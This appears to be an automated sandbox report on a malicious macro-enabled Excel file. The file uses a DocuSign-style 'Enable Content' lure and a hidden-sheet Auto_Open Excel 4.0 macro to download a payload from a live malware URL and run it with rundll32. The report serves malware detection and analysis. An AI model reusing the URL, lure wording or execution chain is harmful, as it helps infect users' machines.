Loading ...

Play interactive tourEdit tour

Analysis Report Refusal-743510550-01212021.xlsm

Overview

General Information

Sample Name:Refusal-743510550-01212021.xlsm
Analysis ID:343866
MD5:46a087edfdd6cd9f32e71658475bbd80
SHA1:d5e243201b2b02fd30f5eb96693c5afacd529903
SHA256:3099fc48fbfb503b607c72c475af8df937b4036a5fdbe430ce2707e7d2388d19

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected MalDoc_1
Checks for available system drives (often done to infect USB drives)
Excel documents contains an embedded macro which executes code when the document is opened
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5912 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6540 cmdline: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet2.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5912, ProcessCommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, ProcessId: 6540

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://www.toteteca.com/qzkiodlofm/5555555555.jpgAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URLShow sources
    Source: toteteca.comVirustotal: Detection: 9%Perma Link
    Source: www.toteteca.comVirustotal: Detection: 6%Perma Link
    Source: http://www.toteteca.com/qzkiodlofm/5555555555.jpgVirustotal: Detection: 15%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: z:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: x:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: v:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: t:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: r:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: p:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: n:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: l:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: j:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: h:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: f:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: b:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: y:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: w:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: u:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: s:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: q:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: o:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: m:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: k:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: i:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: g:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: e:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: c:
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: a:

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: global trafficDNS query: name: www.toteteca.com
    Source: global trafficTCP traffic: 192.168.2.3:49717 -> 172.107.2.98:80
    Source: global trafficTCP traffic: 192.168.2.3:49717 -> 172.107.2.98:80

    Networking:

    barindex
    Yara detected MalDoc_1Show sources
    Source: Yara matchFile source: sheet2.xml, type: SAMPLE
    Source: Joe Sandbox ViewASN Name: TIER-NETUS TIER-NETUS
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: www.toteteca.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.cortana.ai
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.office.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.onedrive.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://augloop.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cdn.entity.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cortana.ai
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cortana.ai/api
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://cr.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://directory.services.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://graph.windows.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://graph.windows.net/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://login.windows.local
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://management.azure.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://management.azure.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://messaging.office.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://officeapps.live.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://onedrive.live.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://outlook.office.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://settings.outlook.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://tasks.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 47DB79C7-3182-45D7-9E77-20E9958CA999.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 12" from the yellow bar above 13 14" @Once You have Enable Editing, please cli
    Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 "- WHY ICANNOT OPEN THIS DOCUMENT? 19 20 11
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 12" from the yellow bar above 13 14" @Once You have Enable Editing, please cli
    Source: Screenshot number: 8Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 "- WHY ICANNOT OPEN THIS DOCUMENT? 19 20 :)
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Refusal-743510550-01212021.xlsmInitial sample: EXEC
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Kotu" sheetId="4" state="hidden" r:id="rId2"/><sheet name="Mols" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Kotu!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@3/11@1/1
